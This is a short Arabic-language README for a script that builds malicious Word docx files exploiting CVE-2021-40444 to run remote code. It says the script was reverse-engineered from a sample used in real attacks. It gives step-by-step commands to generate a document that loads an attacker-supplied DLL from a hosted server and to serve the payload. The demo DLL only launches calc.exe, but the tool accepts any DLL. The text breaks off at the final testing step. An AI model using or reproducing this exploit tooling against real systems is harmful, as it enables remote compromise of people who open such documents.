
مولّد مستندات docx خبيثة لاستغلال CVE-2021-40444 (تنفيذ التعليمات البرمجية عن بُعد في Microsoft Office Word)
تم إنشاء هذا السكريبت بناءً على بعض الهندسة العكسية للعينة المستخدمة في الهجمات الفعلية: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (ملف docx)
يجب تثبيت lcab أولاً (sudo apt-get install lcab)
راجع REPRODUCE.md للحصول على خطوات إعادة الإنتاج اليدوية
إذا لم يعمل ملف cab الذي تم إنشاؤه، فجرّب توجيه عنوان URL الخاص بـ exploit.html إلى calc.cab
أولاً، قم بإنشاء مستند docx خبيث باستخدام ملف DLL، يمكنك استخدام الملف الموجود في test/calc.dll والذي يقوم فقط بتشغيل calc.exe عبر استدعاء system()
python3 exploit.py generate test/calc.dll http://<SRV IP>

بمجرد إنشاء ملف docx الخبيث (سيكون في مجلد out/)، يمكنك إعداد الخادم:
sudo python3 exploit.py host 80

أخيرًا، جرّب ملف docx على جهاز افتراضي يعمل بنظام Windows:
